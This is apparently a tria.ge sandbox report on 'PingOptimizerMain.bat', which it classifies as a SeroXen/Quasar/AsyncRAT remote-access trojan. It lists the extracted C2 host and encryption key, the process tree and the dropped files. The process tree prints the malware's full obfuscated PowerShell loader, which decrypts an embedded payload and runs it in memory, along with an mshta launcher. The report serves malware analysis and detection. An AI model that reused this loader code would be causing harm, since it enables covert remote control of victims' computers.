Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

PingOptimizerMain.bat

windows11-21h2-x64

10

Resubmissions

09/01/2024, 11:27

240109-nkymhsgdcj 10

09/01/2024, 11:03

240109-m5m6vaffdq 10

Analysis

  • max time kernel
    50s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09/01/2024, 11:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PingOptimizerMain.bat

  • Size

    11.7MB

  • MD5

    ffc97bdf56ecbee34e263c88f330a9fd

  • SHA1

    7f83beb8534cdc3f3ee2147e74d6f698812f2859

  • SHA256

    d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e

  • SHA512

    09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1

  • SSDEEP

    49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X

Score
10/10
asyncratquasarv3.0.6 | seroxenratspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v3.0.6 | SeroXen

C2

amazon-nr.gl.at.ply.gg:56754

Mutex

a84ac298-1532-4b9d-a759-74f70b16a4b6

Attributes
  • encryption_key

    F28222E368B70A89947BE773CD2BA6F55AF0A35F

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Async RAT payload 1 IoCs
    rat
  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:712
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:652
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:780
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:332
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:444
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:796
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1072
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1644
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "
                    2⤵
                      PID:4084
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                      2⤵
                      • Deletes itself
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4196
                  • C:\Windows\$sxr-mshta.exe
                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-DlMgztMMqWzEVacEgNiQ4312:RdBWbrwb=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                    1⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:1508
                    • C:\Windows\$sxr-cmd.exe
                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-DlMgztMMqWzEVacEgNiQ4312:RdBWbrwb=%
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1520
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo function Rluao($GATpr){ $zbUvP=[System.Security.Cryptography.Aes]::Create(); $zbUvP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zbUvP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zbUvP.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('Jvne7EqTDjJUxdhZ6WfQ6qFa+P92IqL9Im6fxubmiPg='); $zbUvP.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('t5Jzj2fl8QhbaUyRkJ3dow=='); $Bwqdi=$zbUvP.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $fRUkc=$Bwqdi.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($GATpr, 0, $GATpr.Length); $Bwqdi.Dispose(); $zbUvP.Dispose(); $fRUkc;}function PSYYc($GATpr){ $YXOVu=New-Object System.IO.MemoryStream(,$GATpr); $UjuqW=New-Object System.IO.MemoryStream; Invoke-Expression '$cPoob @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$YXOVu,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $cPoob.CopyTo($UjuqW); $cPoob.Dispose(); $YXOVu.Dispose(); $UjuqW.Dispose(); $UjuqW.ToArray();}function PkOpP($GATpr){ $fRUkc = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($GATpr); $fRUkc = Rluao($fRUkc); $fRUkc = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($fRUkc); return $fRUkc;}function execute_function($GATpr,$ZpOdX){ $dXLTQ = @( '$EQTGj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$GATpr);'.Replace('@', ''), '$zuJZD = $EQTGj.EntryPoint;', '$zuJZD.Invoke($null, $ZpOdX);' ); foreach ($htxYm in $dXLTQ) { Invoke-Expression $htxYm };}$OGwkk = PkOpP('Ddsfg+DubgptLKxYJOWSvg==');$pvzVw = PkOpP('qVKL5Ug8qrvHnpSvoJDFLWeq6BH6Nv5pdzoKtiMQD+s=');$SDKFb = PkOpP('WFuvx/6oMAg1+9D4fqqi6A==');$IVatZ = PkOpP('rkmtA5yUVqXZUFWW8Vi8kg==');if (@(get-process -ea silentlycontinue $IVatZ).count -gt 1) {exit};$YuMaQ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($OGwkk).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pvzVw);$ZVkMP=PSYYc (Rluao ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($YuMaQ)));execute_function $ZVkMP (,[string[]] ($SDKFb)); "
                        3⤵
                          PID:3912
                        • C:\Windows\$sxr-powershell.exe
                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1488

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Filesize

                      62KB

                      MD5

                      e566632d8956997225be604d026c9b39

                      SHA1

                      94a9aade75fffc63ed71404b630eca41d3ce130e

                      SHA256

                      b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

                      SHA512

                      f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkzsow5p.xeg.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      Download Submit

                    • C:\Windows\$sxr-cmd.exe
                      Filesize

                      324KB

                      MD5

                      c5db7b712f280c3ae4f731ad7d5ea171

                      SHA1

                      e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

                      SHA256

                      f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

                      SHA512

                      bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

                      Download Submit

                    • C:\Windows\$sxr-mshta.exe
                      Filesize

                      32KB

                      MD5

                      356e04e106f6987a19938df67dea0b76

                      SHA1

                      f2fd7cde5f97427e497dfb07b7f682149dc896fb

                      SHA256

                      4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

                      SHA512

                      df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

                      Download Submit

                    • C:\Windows\$sxr-powershell.exe
                      Filesize

                      440KB

                      MD5

                      0e9ccd796e251916133392539572a374

                      SHA1

                      eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                      SHA256

                      c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                      SHA512

                      e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                      Download Submit

                    • memory/332-101-0x0000014FE4A90000-0x0000014FE4AB7000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/332-98-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/444-118-0x00000246998E0000-0x0000024699907000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/444-156-0x0000020E23B20000-0x0000020E23B47000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/444-116-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/652-90-0x00007FFD6DFC4000-0x00007FFD6DFC5000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/652-136-0x00000196A0760000-0x00000196A0787000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/652-87-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/652-88-0x00000196A0760000-0x00000196A0787000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/652-86-0x00000196A0760000-0x00000196A0787000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/652-85-0x00000196A0730000-0x00000196A0751000-memory.dmp

                      Filesize

                      132KB

                      Download

                    • memory/712-95-0x00000251A8B20000-0x00000251A8B47000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/712-93-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/780-104-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/780-109-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/780-111-0x000001F6363B0000-0x000001F6363D7000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/796-108-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/796-113-0x0000020E23B20000-0x0000020E23B47000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1072-124-0x000001ED47710000-0x000001ED47737000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1072-121-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1128-169-0x00000238F9890000-0x00000238F98B7000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1128-128-0x00000238F9890000-0x00000238F98B7000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1128-127-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1136-132-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1136-138-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1136-140-0x000001D27B360000-0x000001D27B387000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1148-137-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1148-143-0x00000224E5100000-0x00000224E5127000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1240-144-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1240-148-0x0000020970850000-0x0000020970877000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1308-149-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1308-151-0x000001D626AE0000-0x000001D626B07000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1376-154-0x00007FFD2DFB0000-0x00007FFD2DFC0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1376-157-0x0000012D21510000-0x0000012D21537000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1440-161-0x000001DDEE260000-0x000001DDEE287000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1468-173-0x000001F513B90000-0x000001F513BB7000-memory.dmp

                      Filesize

                      156KB

                      Download

                    • memory/1468-172-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-72-0x0000016E74410000-0x0000016E74420000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1488-71-0x0000016E74410000-0x0000016E74420000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1488-70-0x0000016E7DA00000-0x0000016E7E160000-memory.dmp

                      Filesize

                      7.4MB

                      Download

                    • memory/1488-73-0x0000016E7E160000-0x0000016E7E526000-memory.dmp

                      Filesize

                      3.8MB

                      Download

                    • memory/1488-74-0x0000016E7E530000-0x0000016E7E5E2000-memory.dmp

                      Filesize

                      712KB

                      Download

                    • memory/1488-77-0x0000016E7E7E0000-0x0000016E7E828000-memory.dmp

                      Filesize

                      288KB

                      Download

                    • memory/1488-78-0x0000016E5C210000-0x0000016E5C232000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/1488-82-0x0000000180000000-0x0000000180007000-memory.dmp

                      Filesize

                      28KB

                      Download

                    • memory/1488-69-0x0000016E7D4E0000-0x0000016E7D9FC000-memory.dmp

                      Filesize

                      5.1MB

                      Download

                    • memory/1488-68-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-67-0x0000016E74410000-0x0000016E74420000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1488-66-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-65-0x00007FFD4CB50000-0x00007FFD4D612000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/1488-64-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-63-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-62-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-100-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-61-0x00007FFD6DD50000-0x00007FFD6DE0D000-memory.dmp

                      Filesize

                      756KB

                      Download

                    • memory/1488-60-0x0000016E7CBD0000-0x0000016E7D1C6000-memory.dmp

                      Filesize

                      6.0MB

                      Download

                    • memory/1488-122-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/1488-57-0x0000016E74410000-0x0000016E74420000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/1488-56-0x00007FFD4CB50000-0x00007FFD4D612000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/1488-112-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-47-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-20-0x00007FFD4CB50000-0x00007FFD4D612000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/4196-36-0x000002039CE40000-0x000002039CE46000-memory.dmp

                      Filesize

                      24KB

                      Download

                    • memory/4196-59-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-29-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-28-0x000002039E0F0000-0x000002039E11C000-memory.dmp

                      Filesize

                      176KB

                      Download

                    • memory/4196-27-0x000002039E090000-0x000002039E0E8000-memory.dmp

                      Filesize

                      352KB

                      Download

                    • memory/4196-26-0x000002039D520000-0x000002039D570000-memory.dmp

                      Filesize

                      320KB

                      Download

                    • memory/4196-25-0x000002039DFF0000-0x000002039E08C000-memory.dmp

                      Filesize

                      624KB

                      Download

                    • memory/4196-24-0x000002039D5C0000-0x000002039DFEC000-memory.dmp

                      Filesize

                      10.2MB

                      Download

                    • memory/4196-23-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-22-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-21-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-37-0x0000000180000000-0x0000000180007000-memory.dmp

                      Filesize

                      28KB

                      Download

                    • memory/4196-19-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-18-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-16-0x00007FFD6DF20000-0x00007FFD6E129000-memory.dmp

                      Filesize

                      2.0MB

                      Download

                    • memory/4196-15-0x00007FFD6DD50000-0x00007FFD6DE0D000-memory.dmp

                      Filesize

                      756KB

                      Download

                    • memory/4196-14-0x00000203D5820000-0x00000203D60C8000-memory.dmp

                      Filesize

                      8.7MB

                      Download

                    • memory/4196-13-0x000002039D570000-0x000002039D5B6000-memory.dmp

                      Filesize

                      280KB

                      Download

                    • memory/4196-12-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-11-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-8-0x000002039CF90000-0x000002039CFB2000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/4196-10-0x000002039CFC0000-0x000002039CFD0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4196-9-0x00007FFD4CB50000-0x00007FFD4D612000-memory.dmp

                      Filesize

                      10.8MB

                      Download